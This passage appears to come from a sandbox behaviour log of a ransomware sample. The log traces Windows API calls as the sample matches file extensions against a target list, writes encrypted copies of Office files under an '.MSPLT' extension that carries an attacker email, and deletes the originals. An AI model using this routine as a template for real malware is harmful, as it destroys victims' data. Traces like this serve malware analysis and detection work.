lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString=".bz2") returned 4 [0183.503] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString=".7z") returned 3 [0183.503] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.503] lstrlenW (lpString=".dbf") returned 4 [0183.503] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.503] lstrlenW (lpString=".1cd") returned 4 [0183.503] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.503] lstrlenW (lpString=".jpg") returned 4 [0183.503] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.503] lstrlenW (lpString=".doc") returned 4 [0183.503] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString=".docx") returned 5 [0183.504] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.504] lstrlenW (lpString=".pdf") returned 4 [0183.504] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString=".xls") returned 4 [0183.504] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString=".xlsx") returned 5 [0183.504] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.504] lstrlenW (lpString=".ppt") returned 4 [0183.504] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.504] lstrlenW (lpString=".zip") returned 4 [0183.504] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.504] lstrlenW (lpString=".rar") returned 4 [0183.504] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString=".bz2") returned 4 [0183.504] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString=".7z") returned 3 [0183.504] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.504] lstrlenW (lpString=".dbf") returned 4 [0183.504] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.504] lstrlenW (lpString=".1cd") returned 4 [0183.504] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.504] lstrlenW (lpString=".jpg") returned 4 [0183.504] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.505] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.505] lstrlenW (lpString="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 53 [0183.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0183.506] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=1261) returned 1 [0183.506] CloseHandle (hObject=0x354) returned 1 [0183.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml")) returned 0x220 [0183.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0183.507] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.507] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.507] GetLastError () returned 0x0 [0183.507] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0183.510] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0183.511] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.511] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.511] SetEndOfFile (hFile=0x374) returned 1 [0183.511] CloseHandle (hObject=0x374) returned 1 [0183.518] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.518] SetEndOfFile (hFile=0x354) returned 1 [0183.519] CloseHandle (hObject=0x354) returned 1 [0183.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.519] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml")) returned 1 [0183.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.520] lstrlenW (lpString=".doc") returned 4 [0183.520] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.520] lstrlenW (lpString=".docx") returned 5 [0183.520] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.520] lstrlenW (lpString=".pdf") returned 4 [0183.520] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.520] lstrlenW (lpString=".xls") returned 4 [0183.520] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.520] lstrlenW (lpString=".xlsx") returned 5 [0183.520] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.520] lstrlenW (lpString=".ppt") returned 4 [0183.520] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.520] lstrlenW (lpString=".zip") returned 4 [0183.520] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.520] lstrlenW (lpString=".rar") returned 4 [0183.520] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.520] lstrlenW (lpString=".bz2") returned 4 [0183.520] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.520] lstrlenW (lpString=".7z") returned 3 [0183.520] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.521] lstrlenW (lpString=".dbf") returned 4 [0183.521] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.522] lstrlenW (lpString=".1cd") returned 4 [0183.522] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.522] lstrlenW (lpString=".jpg") returned 4 [0183.522] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.522] lstrlenW (lpString=".doc") returned 4 [0183.522] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.522] lstrlenW (lpString=".docx") returned 5 [0183.522] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.522] lstrlenW (lpString=".pdf") returned 4 [0183.522] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.522] lstrlenW (lpString=".xls") returned 4 [0183.522] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.523] lstrlenW (lpString=".xlsx") returned 5 [0183.523] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.523] lstrlenW (lpString=".ppt") returned 4 [0183.523] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.523] lstrlenW (lpString=".zip") returned 4 [0183.523] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.523] lstrlenW (lpString=".rar") returned 4 [0183.523] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.523] lstrlenW (lpString=".bz2") returned 4 [0183.523] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.523] lstrlenW (lpString=".7z") returned 3 [0183.523] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.523] lstrlenW (lpString=".dbf") returned 4 [0183.523] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.523] lstrlenW (lpString=".1cd") returned 4 [0183.523] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0183.523] lstrlenW (lpString=".jpg") returned 4 [0183.523] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.523] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.523] lstrlenW (lpString="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 53 [0183.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0183.525] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=1261) returned 1 [0183.525] CloseHandle (hObject=0x354) returned 1 [0183.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml")) returned 0x220 [0183.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0183.525] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.525] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.526] GetLastError () returned 0x0 [0183.526] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0183.949] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0183.964] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.964] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.964] SetEndOfFile (hFile=0x374) returned 1 [0183.964] CloseHandle (hObject=0x374) returned 1 [0183.968] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.968] SetEndOfFile (hFile=0x354) returned 1 [0183.969] CloseHandle (hObject=0x354) returned 1 [0183.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.970] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml")) returned 1 [0183.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.971] lstrlenW (lpString=".doc") returned 4 [0183.971] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.971] lstrlenW (lpString=".docx") returned 5 [0183.971] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.971] lstrlenW (lpString=".pdf") returned 4 [0183.971] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.971] lstrlenW (lpString=".xls") returned 4 [0183.971] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.971] lstrlenW (lpString=".xlsx") returned 5 [0183.971] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.971] lstrlenW (lpString=".ppt") returned 4 [0183.971] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.971] lstrlenW (lpString=".zip") returned 4 [0183.971] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.971] lstrlenW (lpString=".rar") returned 4 [0183.971] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.971] lstrlenW (lpString=".bz2") returned 4 [0183.971] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.971] lstrlenW (lpString=".7z") returned 3 [0183.971] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.971] lstrlenW (lpString=".dbf") returned 4 [0183.971] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.972] lstrlenW (lpString=".1cd") returned 4 [0183.972] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.972] lstrlenW (lpString=".jpg") returned 4 [0183.972] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.972] lstrlenW (lpString=".doc") returned 4 [0183.972] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.972] lstrlenW (lpString=".docx") returned 5 [0183.972] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.972] lstrlenW (lpString=".pdf") returned 4 [0183.972] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.972] lstrlenW (lpString=".xls") returned 4 [0183.972] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.972] lstrlenW (lpString=".xlsx") returned 5 [0183.972] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.972] lstrlenW (lpString=".ppt") returned 4 [0183.972] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.972] lstrlenW (lpString=".zip") returned 4 [0183.972] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.972] lstrlenW (lpString=".rar") returned 4 [0183.972] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.972] lstrlenW (lpString=".bz2") returned 4 [0183.972] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.973] lstrlenW (lpString=".7z") returned 3 [0183.973] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.973] lstrlenW (lpString=".dbf") returned 4 [0183.973] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.973] lstrlenW (lpString=".1cd") returned 4 [0183.973] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0183.973] lstrlenW (lpString=".jpg") returned 4 [0183.973] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.973] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0183.973] lstrlenW (lpString="AG00004_.GIF") returned 12 [0183.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0183.978] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=9024) returned 1 [0183.978] CloseHandle (hObject=0x354) returned 1 [0183.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif")) returned 0x220 [0183.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0183.979] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.979] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.979] GetLastError () returned 0x0 [0183.979] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x2340, lpOverlapped=0x0) returned 1 [0183.982] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x2350, lpOverlapped=0x0) returned 1 [0183.988] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.988] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.988] SetEndOfFile (hFile=0x374) returned 1 [0183.988] CloseHandle (hObject=0x374) returned 1 [0183.992] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.992] SetEndOfFile (hFile=0x354) returned 1 [0183.993] CloseHandle (hObject=0x354) returned 1 [0183.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0183.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0183.995] lstrlenW (lpString=".doc") returned 4 [0183.995] 